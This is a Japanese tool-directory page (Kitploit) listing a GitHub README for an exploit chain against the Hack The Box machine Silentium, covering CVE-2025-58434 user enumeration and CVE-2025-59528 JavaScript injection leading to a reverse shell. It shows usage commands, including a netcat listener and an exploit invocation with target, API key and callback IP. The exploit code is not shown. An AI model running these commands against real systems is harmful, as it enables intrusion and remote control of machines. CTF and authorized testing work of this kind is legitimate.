Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-58434-59528-htb-ctf — エクスプロイテーション Silentium HTB-CTF | Kitploit
ツール/GitHubGitHub/jwsly12/cve-2025-58434-59528-htb-ctf
ペイロード生成エクスプロイトウェブアプリケーション悪用CTFペネトレーションテスト学習と教育
GitHubjwsly12/cve-2025-58434-59528-htb-ctf

CVE-2025-58434-59528-htb-ctf

エクスプロイテーション Silentium HTB-CTF

リポジトリを見る
23ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-58434-59528-htb-ctf

Silentium エクスプロイトチェーン

このリポジトリには、Hack The BoxのSilentiumマシンに対する完全なエクスプロイトチェーンが含まれています。このエクスプロイトは、ユーザー列挙とJavaScriptインジェクションを含む2段階の脆弱性を利用して、リモートコード実行 (RCE) を達成します。

📝 説明

脆弱性チェーンは、情報漏洩の脆弱性と重大なコードインジェクションから構成されています。まず、パスワードリセットのバグを利用して有効なユーザーを列挙することで、customMCPエンドポイントをターゲットにするために必要なコンテキストを得ます。RCEは、悪意のあるJavaScript関数をmcpServerConfigパラメータに注入することで達成され、Node.jsバックエンドによって実行されます。

🛠️ 特徴

  • ユーザー列挙: ワードリストを使用して有効なシステムメールの発見を自動化します。
  • JavaScriptインジェクション: IIFE(即時実行関数式)を利用してサニタイゼーションをバイパスします。
  • TCPリバースシェル: mkfifoパイプを使用して安定したシェルを生成します。
  • ペイロード自動化: すべてのJSONエスケープとBearer Token認証を自動的に処理します。

🚀 必要条件

Python 3とBashがインストールされている必要があります。また、以下のライブラリが必要です:

pip install requests

💻 使用方法

1. ユーザーの列挙

列挙スクリプト(Bash)を実行して有効なアカウントを見つけます(users.txtが必要です):

python3 CVE-2025-58434.py

2. リスナーを起動する

ローカルマシンでNetcatリスナーを起動します:

nc -lvnp 4444

3. エクスプロイトを実行する

ターゲット、自分のIP、取得したAPIキーを指定してPythonスクリプトを実行します:

python3 CVE-2025-59528.py -t -k <API_KEY> -l <YOUR_IP> -p 4444

⚙️ 引数

⚠️ 免責事項

このスクリプトは教育目的およびCTF環境内での許可されたペネトレーションテストのみを目的としています。事前の許可なしにターゲットにアクセスまたは攻撃することは違法です。


チャレンジ: Silentium (Hack The Box)
CVE: CVE-2025-58434 | CVE-2025-59528

ツールをダウンロード
引数説明必須
-t, --targetターゲットホストはい
-k, --keyAPI Bearer Tokenはい
-l, --lhostリスナーのIP(VPN)はい
-p, --lportリスナーのポートはい